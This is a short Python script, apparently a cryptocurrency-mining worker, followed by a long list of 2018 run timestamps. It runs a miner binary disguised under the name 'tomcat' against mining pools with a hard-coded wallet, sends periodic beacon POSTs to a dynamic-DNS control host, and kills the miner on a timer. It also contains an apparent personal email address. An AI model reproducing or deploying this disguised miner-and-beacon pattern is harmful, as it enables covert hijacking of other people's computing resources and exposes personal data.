import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:27:05.582671
#2018-02-17 17:14:07.064366
#2018-02-17 19:02:07.223296
#2018-02-17 20:50:06.018509
#2018-02-17 22:36:05.257920
#2018-02-18 00:19:07.178128
#2018-02-18 02:10:09.819432
#2018-02-18 03:57:05.089840
#2018-02-18 05:44:01.480907
#2018-02-18 07:36:05.807142
#2018-02-18 09:23:01.450493
#2018-02-18 11:08:05.825275
#2018-02-18 12:55:08.070058
#2018-02-18 14:42:05.388880
#2018-02-18 16:32:01.303163
#2018-02-18 18:21:05.406965
#2018-02-18 20:06:06.045904
#2018-02-18 21:53:06.838618
#2018-02-18 23:43:06.657879
#2018-02-19 01:29:07.020452
#2018-02-19 03:18:04.036072
#2018-02-19 05:04:01.908985
#2018-02-19 06:48:01.655111
#2018-02-19 08:37:01.634445
#2018-02-19 10:26:06.989622
#2018-02-19 12:14:08.916819
#2018-02-19 14:01:07.289538
#2018-02-19 15:50:05.870342
#2018-02-19 17:38:05.590188
#2018-02-19 19:25:01.977206
#2018-02-19 21:11:04.255920
#2018-02-19 22:57:07.677079
#2018-02-20 00:42:03.781699
#2018-02-20 02:32:05.514933
#2018-02-20 04:21:06.200063
#2018-02-20 06:05:06.207363
#2018-02-20 07:50:06.133950
#2018-02-20 09:36:08.611792
#2018-02-20 11:21:09.804032
#2018-02-20 13:08:04.512358
#2018-02-20 14:51:01.868728
#2018-02-20 16:37:07.183653
#2018-02-20 18:24:04.098460
#2018-02-20 20:17:04.371987
#2018-02-20 22:03:07.446739
#2018-02-20 23:47:02.031545
#2018-02-21 01:32:01.891725
#2018-02-21 03:19:04.790187
#2018-02-21 05:06:05.918123
#2018-02-21 06:54:01.699979
#2018-02-21 08:40:07.352786
#2018-02-21 10:25:07.924524
#2018-02-21 12:13:04.209474
#2018-02-21 14:01:10.373644
#2018-02-21 15:46:07.470188
#2018-02-21 17:39:04.933111
#2018-02-21 19:24:04.423574
#2018-02-21 21:11:04.503192
#2018-02-21 23:01:04.360872
#2018-02-22 00:50:09.270614
#2018-02-22 02:38:05.036735
#2018-02-22 04:23:05.865669
#2018-02-22 06:10:09.889949
#2018-02-22 07:56:03.545007
#2018-02-22 09:45:07.260997
#2018-02-22 11:29:01.601096
#2018-02-22 13:14:06.755507
#2018-02-22 15:04:03.793285
#2018-02-22 16:48:02.072771
#2018-02-22 18:34:09.216179
#2018-02-22 20:27:04.129881
#2018-02-22 22:12:08.323240
#2018-02-22 23:58:04.522066
#2018-02-23 01:47:04.457042
#2018-02-23 03:34:01.595373
#2018-02-23 05:18:05.729792
#2018-02-23 07:04:01.891455
#2018-02-23 08:52:06.472889
#2018-02-23 11:11:07.984913
#2018-02-23 13:05:08.817954
#2018-02-23 14:50:10.096175
#2018-02-23 16:39:04.880931
#2018-02-23 18:27:08.694840
#2018-02-23 20:13:02.049284
#2018-02-23 22:02:06.102377
#2018-02-23 23:50:07.143033
#2018-02-24 01:40:09.768507
#2018-02-24 03:28:08.264205
#2018-02-24 05:14:01.460010
#2018-02-24 07:02:07.821946
#2018-02-24 08:34:07.379016
#2018-02-24 10:08:07.065966
#2018-02-24 11:54:07.513670
#2018-02-24 13:21:08.127057
#2018-02-24 14:53:03.598674
#2018-02-24 16:26:04.934946
#2018-02-24 18:02:07.284499
#2018-02-24 19:31:07.309854
#2018-02-24 21:08:04.746517
#2018-02-24 23:12:01.686194
#2018-02-25 01:33:01.462393
#2018-02-25 04:28:06.981610
#2018-02-25 07:23:01.983121
#2018-02-25 11:40:08.157918
#2018-02-25 14:06:01.622688
#2018-02-25 15:41:01.902490